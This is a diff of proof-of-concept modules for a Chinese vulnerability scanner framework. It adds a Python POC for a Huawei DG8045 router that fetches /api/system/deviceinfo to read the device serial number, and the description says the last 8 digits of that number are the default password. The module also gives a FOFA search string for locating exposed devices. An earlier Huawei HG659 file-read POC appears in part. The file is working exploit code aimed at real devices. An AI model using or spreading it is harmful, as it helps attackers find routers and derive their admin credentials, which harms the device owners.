""", # POC描述写更新描述没有就不写
"name" : "Huawei HG659 lib 任意文件读取漏洞", # 漏洞名称
"VulnID" : "Blen-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"VulnID" : "oFx-2021-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "Huawei HG659", # 漏洞应用名称
"AppVersion" : "", # 漏洞应用版本
"VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx

View File

@@ -0,0 +1,74 @@
# coding:utf-8
import requests
from lib.core.common import url_handle,get_random_ua
from lib.core.poc import POCBase
# ...
import urllib3
urllib3.disable_warnings()
class POC(POCBase):
_info = {
"author" : "jijue", # POC作者
"version" : "1", # POC版本默认是1
"CreateDate" : "2022-01-01", # POC创建时间
"UpdateDate" : "2022-01-01", # POC创建时间
"PocDesc" : """
""", # POC描述写更新描述没有就不写
"name" : "华为路由器敏感信息泄露 DG8045 Router 1.0", # 漏洞名称
"VulnID" : "oFx-2022-0001", # 漏洞编号以CVE为主若无CVE使用CNVD若无CNVD留空即可
"AppName" : "华为DG8045路由器", # 漏洞应用名称
"AppVersion" : "1.0版本", # 漏洞应用版本
"VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天格式xxxx-xx-xx
"VulnDesc" : """
路由器默认密码是序列号的最后8位
""", # 漏洞简要描述
"fofa-dork":"""
app="DG8045-Home-Gateway-DG8045"
""", # fofa搜索语句
"example" : "", # 存在漏洞的演示url写一个就可以了
"exp_img" : "", # 先不管
}
def _verify(self):
"""
返回vuln
存在漏洞vuln = [True,html_source] # html_source就是页面源码
不存在漏洞vuln = [False,""]
"""
vuln = [False,""]
url = self.target + "/api/system/deviceinfo" # url自己按需调整
headers = {
"User-Agent":get_random_ua(),
"Connection":"close",
"X-Requested-With": "XMLHttpRequest",
# "Content-Type": "application/x-www-form-urlencoded",
}
try:
"""
检测逻辑漏洞存在则修改vuln值为True漏洞不存在则不动
"""
req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
if "SerialNumber" in req.text and "DeviceName" in req.text:
vuln = [True,req.text]
else:
vuln = [False,req.text]
except Exception as e:
raise e
# 以下逻辑酌情使用
if self._honeypot_check(vuln[1]) == True:
vuln[0] = False
return vuln
def _attack(self):
return self._verify()

Some files were not shown because too many files have changed in this diff Show More